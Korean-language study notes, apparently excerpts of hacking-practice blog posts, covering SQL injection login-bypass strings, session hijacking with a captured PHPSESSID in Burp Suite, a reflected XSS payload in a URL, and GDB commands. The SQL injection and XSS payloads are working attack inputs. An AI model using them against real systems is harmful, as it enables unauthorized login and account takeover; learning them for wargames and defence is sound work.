Id = ' ' or 1=1 limit n,1; n번째 아이디로 로그인 SQL injection 싱글쿼트(') 트릭 ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a 주석 #(%23), -- Select id from user_db where id'' and Pw='notice' nad length(database())='5 Notice' and ascii(length(database()))='54.0 '\' or \'a\'=\'a' Addslashes() 우회법 http://securityidiots.com/Web-Pentest/SQL-Injection/addslashes-bypass-sql-injection.html pw=’||..

클릭 Pwnable.kr PHPSESSID=tdl21lkc7116mthb1do16be0m1 Burp suite를 이용한 session 하이재킹 웹브라우저 Proxy 설정 후 쿠키안의 PHPSESSID 캡쳐 Intercept한 GET 요청에 복사한 SESSID 붙여넣고 전송 크로스 사이트 스크립팅 (XSS) 웹페이지의 입력칸을 이용 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet IFRAME Event based (filter evasion) Reflected XSS??? Get방식일 경우 ? 뒤에 스크립트 삽입 http://14.36.28.173/main.php?field=%3Cscript%3Ealert%281%29%3C/script%3E&..

1. 우선 컴파일 시에 디버깅 정보를 담아야 한다. gcc -g -o [프로그램명] [소스파일명] 디버깅 옵션인 -g 으로 컴파일하며, 최적화 옵션인 -O 은 주지 않도록 한다. 2. 실행방법 gdb [프로그램명] gdb [프로그램명] [core파일명] gdb [프로그램명] [실행중인프로세스pid] 3. 종료방법 q Ctrl + d 4. 소스 찾아가기 (list) l : main 함수를 기점으로 소스의 내용이 출력된다 l 10 : 10 행 주변의 소스가 출력되는데 10 - 5 행부터 10 + 5행까지 총 10행이 출려된다. l func : func 함수의 소스를 출력 l -5 : 기본값으로 10줄이 출력된다고 가정하고, 다음에 출력될 라인이 11라인이라면, 10(마지막라인) - 5 라인을 중심으로 출력된..

-------------------------------------------------------------------- GDB 사용법 ● 실행방법 Gdb “프로그램명” -c, -p 등의 옵션을 이용해 상황에 따라 실행할 수 있다. (man gdb 참고) Ex) gdb -q bigbof01 ● 어셈블리어 코드 보기 disas func : func 함수의 어셈블리어 코드를 출력한다. 함수 이름을 찾아갈 수 있을 때만가능하다. 밑의 메모리확인 명령에서 x/i $eip를 이용하여 볼 수 있다. ● 브레이크 포인트 break(b) func break(b) *func+5 break(b) *0x804000\ Ex) b *main+45, b *main info break (i b) : 현재 걸려있는 모든 break..